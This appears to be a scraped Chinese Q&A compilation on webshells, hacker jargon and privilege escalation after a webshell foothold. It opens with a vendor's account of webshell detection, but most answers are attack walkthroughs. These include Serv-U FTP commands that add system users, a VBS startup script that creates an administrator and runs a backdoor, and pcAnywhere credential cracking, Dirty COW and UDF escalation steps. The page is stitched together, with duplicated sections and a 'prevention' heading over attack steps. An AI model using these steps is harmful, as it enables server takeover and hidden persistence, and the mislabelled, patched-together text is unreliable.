Ⅰ 悬镜中的webshell是如何使用的
WebShell是一种常见的网页后门,它常常被攻击者用来获取Web服务器的操作权限。攻击者在进行网站入侵时,通常会将WebShell文件与Web目录下的长长网页文件放置在一起,然后通过浏览器访问WebShell文件,从而获取命令执行环境,最终达到控制网站服务器的目的。
当网站服务器被控制后,就可以在其上任意查看数据库、上传下载文件以及执行任意程序命令等。WebShell与正常网页具有相同的运行环境和服务端口,它与远程主机通过WWW(80)端口进行数据交换的,一次能够很容易地避开杀毒软件的检测和穿透防火墙。
总体,悬镜服务器卫士中WebShell的作用,一方面,WebShell常常被站长用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。另一方面,被入侵者利用,从而达到控制网站服务器的目的。
这些网页脚本常称为Web脚本木马,目前比较流行的ASP或php木马,也有基于.NET的脚本木马。悬镜服务器卫士中系统应用防护中WebShell检测,所要应对的就是后者。
悬镜服务器卫士WebShell有以下5种攻击方式:
1)首先通过系统前台上传WebShell脚本到网站服务器,此时,网站服务器会向客户端返回上传文件的整体URL信息;然后通过URL对这个脚本进行访问,使其可以执行;最终导致攻击者能够在网站的任意目录中上传悬镜服务器卫士WebShell,从而获取管理员权限。
2)攻击者利用管理员密码登录进入后台系统,并借助后台管理工具向配置文件写入悬镜服务器卫士WebShell,允许任意脚本文件上传。
3)通过数据库的备份和恢复功能和获取WebShell。在数据库备份时,可以将备份文件的扩展名更改为.asp类型。
4)系统中其他站点遭受攻击,或者搭载在Web服务器上的Ftp服务器遭受攻击后,被注入了WebShell,这些都会导致整个网站系统被感染。
5) 攻击者利用Web服务器漏洞直接对其进行攻击,从而获得控制权限。
WebShell的感染过程描述:
1)攻击者首先通过SQL注入、跨站脚本攻击等方式得到上传权限,然后将WebShell上传至服务器。
2)通过WebShell完成对服务器的控制,实现植入僵尸木马、篡改网页以及获取敏感信息等恶意功能。
3)植入攻击木马,使其作为攻击“肉鸡”对整个网站进行感染。
3.4.1.5linux下WebShell攻击
WebShell反弹命令行Shell的方式在Linux从操作系统下Web服务器入侵提权过程中得到了广泛应用。在Linux下,WebShell可以执行命令,然后溢出却必须在交互环境中进行,否则即使提权成功,也不能获得完美利用。
因此,为了完成WebShell攻击,只需反弹一个Shell命令行窗口,在命令行终端下执行溢出并进行提权。
多数Linux操作系统下的PHP WebShell都通过反弹连接功能获得一个继承当前WebShell权限的Shell命令行窗口。在使用反弹连接功能前,需要首先使用NC工具对一个未使用的端口进行监听,然后选择反弹连接方式。
3.4.1.6 WebShell检测
对于WebShell的检测,北京安普诺网络安全团队通过自主研发,设计出一种综合多种检测方法的综合检测方案。
特征检测系统中核心是特征提取,选取特征的好坏直接关系到检测结果的优劣。因此,在进行特征选取时,首先应对Web页面本身进行充分考虑,使得选取的特征能够很好地表现出静态页面。其次,选取的特征还应该具有动态特点,可以体现出页面所进行的操作。
如果提取网页的全部特征进行处理,则无法检测变形的WebShell,也会因为特征过多而对效率产生影响。如果检测特征过少,则有可能产生误报。通过将多个WebShell库综合在一起,同时,又加入公司积累的特征码,综合构建了一个非常强大的WebShell特征库,这个特征库构成了WebShell检测的依据。
通过对文件进行特征库匹配、文件base64编码后特征库匹配、可疑特征码匹配等多种手段进行扫描,从而保证扫描准确性并且降低误报率。
扫描后,可以具体的提供WebShell的名称、类型等详细信息,以供用户参考。并且针对反馈,用户还可以有选择的执行“清理”、“添加信任”等功能,以此实现对WebShell的检测、发现、处理等操作。
特征检测是比较常见的WebShell检测方法,base64编码后特征匹配相对于普通特征码检测的优势在于匹配的准确性更高误报率更低。
但是特征检测的局限性还是存在的,就是同时降低误报率和漏报率是很难实现的,所以还需要别的手段对文件进行综合的检测。
为此悬镜服务器卫士中有Delttime(文件创建时间间隔),Fnum(文件数量阈值)的概念。以特征属性、Delttime属性、Fnum属性作为Webshell动态检测算法的主要3个输入参数,根据不同参数对检测结果的影响大小来决定其在算法中的权重。
实践证明该算法检测效率相对传统特征值检测大幅降低检测误报率,有一定的可行性。目前悬镜服务器卫士正在申请国家发明专利。与此同时,为了方便用户使用,软件给用户提供“快速扫描”、“自定义扫描”功能。
具体效果,大家可以通过下载使用悬镜服务器卫士就知道了。谢谢。希望这个能帮到你。
Ⅱ 黑客专业名词“提权”,“WEBSHELL”“肉鸡”“暴库”“挂马”这几个词语是什么意思啊
网络提供
提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
肉鸡也称傀儡机,是指可以被黑客远程控制的机器。比如用"灰鸽子"等诱导客户点击或者电脑被黑客攻破或用户电脑有漏洞被种植了木马,黑客可以随意操纵它并利用它做任何事情。肉鸡通常被用作DDOS攻击。可以是各种系统,如windows、linux、unix等,更可以是一家公司、企业、学校甚至是政府军队的服务器。
暴库,就是通过一些技术手段或者程序漏洞得到数据库的地址,并将数据非法下载到本地。黑客非常乐意于这种工作,为什么呢?因为黑客在得到网站数据库后,就能得到网站管理账号,对网站进行破坏与管理,黑客也能通过数据库得到网站用户的隐私信息,甚至得到服务器的最高权限。
所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库“备份/恢复”或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。
Ⅲ Linux系统提权相关!
估计没有什么用处,因为即使你拿到了管理员权限,那也只是一个PHP的root权限。
linux对用户权限划分的很清楚的,当安装PHP后,会有一个相应的用户在系统中生成的,就算你成功提权了,可能你会觉得是系统root的权限,其实是个糖衣炮弹,假的
ps:SSH的漏洞现在已经修复了,而且现在人家用的比较多的也是SSH2,这个的漏洞就更少了,估计提权挺困难的
Ⅳ Linux主机用webshell怎么提权,有地址...
传EXP/编译好的程序
或者各种脚本也行
->
反弹连接
->
运行提权
->
获得root
->
创建后门
->
内网渗透如社工/sync等渗透
再看看别人怎么说的。
Ⅳ 拿到WEBSHELL如何提权~
说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了我们方便,到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就ok了
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里,
那么就会用到ftp,服务器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写~
好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,
启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里把ServUDaemon.ini更换服务器上的。
用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //刚才添加的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe
文件加用户。
如果提示没有权限,那我们就
把后门(server.exe) 传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存为xx.vbe
这个教本的作用是建立user用户密码为pass
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他 C:\Documents and Settings\All Users\“开始”菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本.
接下来就是等了.等他登陆.
第三
就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件, 比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序, 绑定一个批处理或者VBS,然后还是等待服务器重启。
第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所
收获等等。
第五
使用Flashfxp也能提升权限,但是成功率就看你自己的运气了
首先找到FlashFXP文件夹,打开(编辑)Sites. dat,这个文件这是什么东西密码和用户名,
而且密码是
Ⅵ Linux主机用webshell怎么提权,有地址...
传EXP/编译好的程序 或者各种脚本也行 -> 反弹连接 -> 运行提权 -> 获得root -> 创建后门 -> 内网渗透如社工/sync等渗透
Ⅶ 渗透测试之Linux下提权
直接在kali里面启用apache服务
1:在终端输入“vim /etc/apache2/ports.conf” -> 键盘输入i 进入插入编辑模式 -> 修改apache2默认监听端口号为8080 -> 编辑好后,按Esc键+“:wq” 保存退出 -> 在终端输入“/etc/init.d/apache2 start”
2:-> 在浏览器地址栏输入“http://localhost:8080”
直接用kali下的默认web站点 网站环境就不搭建了 直接在网站根目录下上传一个大马 前面挖洞传webshell就跳过了 直接开始提权
上传一个大马上去
先用大马将脏牛提权利用工具上传到服务器上
执行
利用gcc编译dirty.c文件
再执行./dirty 运行dirty
最下面一行是恢复回原先root账号密码的方法
这里就不切换到脏牛创建的用户了
什么是suid提权呢?我理解的就是有个文件,它有s标志,并且他输入root,那么我们运行这个程序就可以有了root的权限,并且这个程序还得能执行命令,不然没什么用处,那么我们就能从普通用户提升到了root权限了。
首先在本地查找符合条件的文件,有以下三个命令
常用的可用于suid提权的文件
我得Linux系统里面一个也没有 这个就过去了 网络也有一些关于SUID提权的文章
Linux提权有很多大牛开发好的提权工具可以参考以下网址
Ⅷ 拿到webshell后如何提权拿下他的服务器
查看服务器支持什么脚本
aspx的脚本权限要比asp的大
支持aspx , 或者支持命令组件
就去找可写目录,..上传提权工具
再不行的话注册表找mssql安装路径
然后下载3个文件..读取mssql密码
这些东西详细的方法你自己去网络找吧
Ⅸ webshell提权CMD添加用户无回显、数据库是MYSQL、如果是权限不够、具体该怎么做求个详细教程。
一般windows中,apache下的php默认才具有system权限,可以直接加用户,jsp马的权限一般也会是system,其他的需要自己提升权限,mysql可以尝试找数据库root密码,进行udf提权(网络udf提权即可找到),还有就是本地溢出,win下的用pr,烤肉,linux下根据版本在网上找相应的exp,祝你好运
Ⅹ webshell提权 怎么预防
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了咱们便利,到体系盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载..cif本地
破解就使用pcanywhere连接就ok了
............................................................................
第二
有良多小黑问我这么把webshell的iis user权限晋升
普通服务器的管理都是本机设计结束然后上传到空间里,
那么就会用到ftp,服务器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限须要servu装置目录可写~
好开始把,首先通过webshell拜访servu安装文件夹下的ServUDaemon.ini把他下载
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下笼罩,
启动servu添加了一个用户,设置为系统管理员,目录C:,存在可执行权限
然后去servu安装目录里把ServUDaemon.ini调换服务器上的。